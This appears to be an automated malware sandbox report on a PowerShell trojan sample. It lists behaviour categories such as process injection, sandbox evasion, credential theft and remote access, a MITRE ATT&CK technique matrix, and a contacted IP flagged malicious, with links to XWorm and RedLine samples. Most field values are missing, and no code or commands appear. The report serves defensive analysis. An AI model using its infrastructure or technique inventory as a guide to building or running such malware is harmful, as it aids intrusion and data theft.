Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: |
Source: | File source: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Window created: | Jump to behavior |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Process Stats: |
Source: | Code function: | 0_2_00007FFD9B980FA4 | |
Source: | Code function: | 3_2_00B3E0A0 | |
Source: | Code function: | 3_2_00B3406D | |
Source: | Code function: | 3_2_00B38140 | |
Source: | Code function: | 3_2_00B36148 | |
Source: | Code function: | 3_2_00B3F288 | |
Source: | Code function: | 3_2_00B32349 | |
Source: | Code function: | 3_2_00B36423 | |
Source: | Code function: | 3_2_00B37600 | |
Source: | Code function: | 3_2_00B3C7D8 | |
Source: | Code function: | 3_2_00B3E8A8 | |
Source: | Code function: | 3_2_00B37830 | |
Source: | Code function: | 3_2_00B36A28 | |
Source: | Code function: | 3_2_00B37A18 | |
Source: | Code function: | 3_2_00B3FB02 | |
Source: | Code function: | 3_2_00B36E28 | |
Source: | Code function: | 3_2_00B30F88 | |
Source: | Code function: | 3_2_00B3BF08 | |
Source: | Code function: | 3_2_00B3E091 | |
Source: | Code function: | 3_2_00B3613B | |
Source: | Code function: | 3_2_00B38125 | |
Source: | Code function: | 3_2_00B35150 | |
Source: | Code function: | 3_2_00B35140 | |
Source: | Code function: | 3_2_00B342E8 | |
Source: | Code function: | 3_2_00B342DB | |
Source: | Code function: | 3_2_00B36267 | |
Source: | Code function: | 3_2_00B375F0 | |
Source: | Code function: | 3_2_00B35550 | |
Source: | Code function: | 3_2_00B35540 | |
Source: | Code function: | 3_2_00B346B0 | |
Source: | Code function: | 3_2_00B366A0 | |
Source: | Code function: | 3_2_00B346A0 | |
Source: | Code function: | 3_2_00B336E0 | |
Source: | Code function: | 3_2_00B336D0 | |
Source: | Code function: | 3_2_00B3F750 | |
Source: | Code function: | 3_2_00B3F741 | |
Source: | Code function: | 3_2_00B3E82F | |
Source: | Code function: | 3_2_00B3E843 | |
Source: | Code function: | 3_2_00B36A18 | |
Source: | Code function: | 3_2_00B3BBC0 | |
Source: | Code function: | 3_2_00B32B50 | |
Source: | Code function: | 3_2_00B32B40 | |
Source: | Code function: | 3_2_00B34DA8 | |
Source: | Code function: | 3_2_00B34D9B | |
Source: | Code function: | 3_2_00B36E18 | |
Source: | Code function: | 3_2_00B30F00 | |
Source: | Code function: | 3_2_00B37F05 | |
Source: | Code function: | 3_2_04D43410 | |
Source: | Code function: | 3_2_04D42DE8 | |
Source: | Code function: | 3_2_04D406D0 | |
Source: | Code function: | 3_2_04D40EF8 | |
Source: | Code function: | 3_2_04D47948 | |
Source: | Code function: | 3_2_04D40963 | |
Source: | Code function: | 3_2_04D48467 | |
Source: | Code function: | 3_2_04D406C0 | |
Source: | Code function: | 3_2_04D48E50 | |
Source: | Code function: | 3_2_04D40FAE | |
Source: | Code function: | 3_2_04D48ADF | |
Source: | Code function: | 3_2_04D48A8A | |
Source: | Code function: | 3_2_04D48A63 | |
Source: | Code function: | 3_2_04D483BF | |
Source: | Code function: | 3_2_04D48B1F |
Source: | Process created: |
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: |
Source: | Classification label: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | .Net Code: | ||
Source: | .Net Code: |
Source: | Code function: | 0_2_00007FFD9B8B8D86 |
Persistence and Installation Behavior |
---|
Source: | Process created: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | File Volume queried: | Jump to behavior | ||
Source: | File Volume queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 212 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 131 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 212 Process Injection | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse | ||
13% | ReversingLabs | Win32.Trojan.Generic |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
92.255.57.155 | unknown | Russian Federation | 42253 | TELSPRU | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1581903 |
Start date and time: | 2024-12-29 09:48:06 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 24s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 92.255.57.155.ps1 |
Detection: | MAL |
Classification: | mal100.troj.evad.winPS1@7/10@0/1 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.12.23.50, 13.107.246.63, 40.126.53.10
- Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 6820 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtDeviceIoControlFile calls found.
- Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description |
---|---|---|
03:48:56 | API Interceptor | |
03:49:00 | API Interceptor | |
03:51:37 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
92.255.57.155 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | CAPTCHA Scam ClickFix, XWorm | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TELSPRU | Get hash | malicious | XWorm | Browse |
| |
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | RedLine | Browse |
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_6ffd24152b5e9a3a3eb1fb64c4ad5c89541278d_74bcc9ed_e7b8dc66-00cb-4169-9a41-bd6311868630\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.213876266779332 |
Encrypted: | false |
SSDEEP: | 192:MCBpk8Qiqz0BU/SaiRgt0GsNzuiFZZ24IO8a9:VB7QiVBU/SabtvezuiFZY4IO8a9 |
MD5: | 9E154CB72CCF82F244806AB2E0076627 |
SHA1: | F853D611EB6B5C3F449ACFBC486AB013BE208EFE |
SHA-256: | D5E8A89BBA393D8EE4D82DD23F5FC351E53136B0ADAB941ED823E942109FA91A |
